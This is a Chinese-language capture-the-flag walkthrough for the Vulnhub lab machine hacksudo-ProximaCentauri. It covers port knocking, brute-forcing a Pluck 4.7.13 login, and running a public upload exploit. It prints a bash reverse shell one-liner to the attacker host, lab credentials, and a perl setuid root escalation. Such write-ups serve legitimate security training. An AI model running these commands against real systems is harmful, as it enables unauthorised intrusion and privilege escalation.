Vulnhub靶机:hacksudo-ProximaCentauri

一、介绍

运行环境:Virtualbox

攻击机:kali(10.0.2.15)

靶机:hacksudo-ProximaCentauri(10.0.2.51)

目标:获取靶机root权限和flag

靶机下载地址:https://www.vulnhub.com/entry/hacksudo-proximacentauri,709/

二、信息收集

使用nmap主机发现靶机ip:10.0.2.51

Vulnhub靶机:hacksudo-ProximaCentauri_第1张图片

使用nmap端口扫描发现,靶机开放端口:22、80

Vulnhub靶机:hacksudo-ProximaCentauri_第2张图片

打开网站未发现可利用的功能点,查看源码也没有发现隐藏信息

使用gobuster和dirsearch工具进行目录爆破

gobuster dir -u http://10.0.2.51 -x txt,php,html,bak --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

dirsearch -u http://10.0.2.51 /usr/share/wordlists/dirb/big.txt

Vulnhub靶机:hacksudo-ProximaCentauri_第3张图片
Vulnhub靶机:hacksudo-ProximaCentauri_第4张图片

发现login.php、flag1.txt、README.md、/planet/

login.php是一个登录页面,发现网站框架为pluck 4.7.13

Vulnhub靶机:hacksudo-ProximaCentauri_第5张图片

查看flag1.txt

Vulnhub靶机:hacksudo-ProximaCentauri_第6张图片

README.md文件存在链接,访问可以查看到cms源码

Vulnhub靶机:hacksudo-ProximaCentauri_第7张图片

访问目录/planet/travel/,查看源码发现隐藏信息

here you can open portal and travel to proxima,the co-ordinate is? RA for open,Dec for close The proxima blackwhole portal…get co-ordinate from https://g.co/kgs/F9Lb6b

翻译:在这里您可以打开门户并前往比邻星,坐标是?RA 表示打开,Dec 表示关闭 proxima blackwhole 门户…从 https://g.co/kgs/F9Lb6b 获取坐标

Vulnhub靶机:hacksudo-ProximaCentauri_第8张图片

应该要使用提供的链接搜索比邻星的坐标,但网站打不开,需要科学上网,有条件的可以自己搜索看看,我这边就使用其他大佬wp搜索出来的数据

RA 14h 29m 43s | Dec –60° 40′ 46′′

那么14、29、43是端口敲门的三个端口:

端口敲门服务,即:knockd服务。该服务通过动态的添加iptables规则来隐藏系统开启的服务,使用自定义的一系列序列号来“敲门”,使系统开启需要访问的服务端口,才能对外访问。不使用时,再使用自定义的序列号来“关门”,将端口关闭,不对外监听。进一步提升了服务和系统的安全性。

knock 10.0.2.51 14 29 43

再次扫描端口,发现22端口已经开放了

Vulnhub靶机:hacksudo-ProximaCentauri_第9张图片

尝试连接ssh,发现一个链接

Vulnhub靶机:hacksudo-ProximaCentauri_第10张图片

浏览器访问,发现列表,应该是一个密码字典

Vulnhub靶机:hacksudo-ProximaCentauri_第11张图片

三、漏洞利用

使用提供的密码字典对网站的登录页面进行爆破,爆破成功发现密码:hacktheplanet

Vulnhub靶机:hacksudo-ProximaCentauri_第12张图片

登录网站

Vulnhub靶机:hacksudo-ProximaCentauri_第13张图片

使用searchsploit工具搜索pluck 4.7.13的历史漏洞

Vulnhub靶机:hacksudo-ProximaCentauri_第14张图片

发现一个上传文件命令执行漏洞,下载exp,利用获取shell

python 49909.py 10.0.2.51 80 hacktheplanet /                           

Vulnhub靶机:hacksudo-ProximaCentauri_第15张图片

访问http://10.0.2.51:80//files/shell.phar

Vulnhub靶机:hacksudo-ProximaCentauri_第16张图片

反弹shell

bash -c 'bash -i >& /dev/tcp/10.0.2.15/4444 0>&1'

Vulnhub靶机:hacksudo-ProximaCentauri_第17张图片

获取交互式shell

python3 -c 'import pty; pty.spawn("/bin/bash")'

在这里插入图片描述

四、提权

使用命令find / -perm -u=s -type f 2>/dev/null查看一下具有SUID权限的二进制可执行文件,没有发现可利用的文件

翻一翻靶机各个文件,发现/var/backups目录具有读权限的数据库备份文件

Vulnhub靶机:hacksudo-ProximaCentauri_第18张图片

查看该文件发现数据库的用户名密码:alfauser:passw0rd

Vulnhub靶机:hacksudo-ProximaCentauri_第19张图片

使用数据库用户名密码登录数据库

mysql -u alfauser -p

Vulnhub靶机:hacksudo-ProximaCentauri_第20张图片

发现一组用户名密码:proxima:alfacentauri123

Vulnhub靶机:hacksudo-ProximaCentauri_第21张图片

使用发现的用户名密码,切换为proxima用户

Vulnhub靶机:hacksudo-ProximaCentauri_第22张图片

没有 sudo,也没有可利用的 SUID 文件,使用命令查看getcap -r / 2>/dev/null查看是否有可利用的可执行的文件,发现perl文件

在这里插入图片描述

使用perl文件进行提权

./perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'

在这里插入图片描述

获取flag

Vulnhub靶机:hacksudo-ProximaCentauri_第23张图片
Vulnhub靶机:hacksudo-ProximaCentauri_第24张图片

参考链接:https://www.cnblogs.com/sainet/p/15805892.html

你可能感兴趣的:(靶场,web安全)